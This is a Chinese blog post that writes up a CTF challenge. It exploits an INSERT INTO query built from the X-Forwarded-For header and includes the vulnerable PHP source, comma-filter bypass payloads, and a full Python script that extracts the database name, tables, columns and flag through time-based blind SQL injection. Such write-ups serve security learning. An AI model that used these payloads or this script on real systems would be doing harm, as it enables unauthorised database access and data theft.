记一道INSERT INTO盲注的CTF题目

于 2020-04-12 15:33:33 发布
阅读量398 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 随笔 CTF 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/a1004070060/article/details/105470167
本文介绍了一种利用盲注技术破解网站安全漏洞的方法,通过构造特定的payload并观察网站响应时间来猜测数据库信息,包括数据库名、表名、列名及最终的flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目链接:链接

题目给出了源码(如下),可以看到网站储存了用户访问时的ip信息。

除了逗号以外未过滤其他输入,直接拼接到insert into语句中,存在注入点,由于没有输出点,考虑使用盲注。

<?php
error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

由于过滤了逗号无法使用if(a,b,c)格式测试,改为使用case when else格式代替。

测试数据库长度,网站延迟回显,证明payload构造成功。

接着猜解名字需要用到substr,被过滤的逗号可以用 from for代替,如

substr((select flag from flag) from 1 for 1

附:题目完整解题过程逐步演示代码

import requests
import time
url="http://123.206.87.240:8002/web15/"
i=0
schelen=0
print("开始猜解数据库长度")
while True:
    payload="127.0.0.1' and case when(length(database())>"+str(i)+") then sleep(5) else 1 end)#"
    # print(payload)
    start=time.time()
    headers={'X-Forwarded-For':payload}
    demo=requests.get(url,headers=headers)
    final=time.time()

    if final-start>4:
        schelen+=1
        print(schelen)
    else:
        print("数据库名长度"+str(schelen))
        break
    i+=1
print("开始猜解database")
flag=""
for j in range(1,schelen+1):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr(database() from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)
print("开始猜解表名")
flag=""
for j in range(1,15):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)
print("开始猜解flag表列名")
flag=""
for j in range(1,15):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x666c6167) from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)
print("开始猜解flag")
flag=""
for j in range(1,35):
    for k in range(40,128):
        payload = "127.0.0.1' and case when(ascii(substr((select flag from flag) from "+str(j)+" for 1))="+str(k)+") then sleep(5) else 1 end)#"
        # print(payload)
        start = time.time()
        headers = {'X-Forwarded-For': payload}
        demo = requests.get(url, headers=headers)
        final = time.time()
        if final-start>4:
            flag+=chr(k)
            print(flag)

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值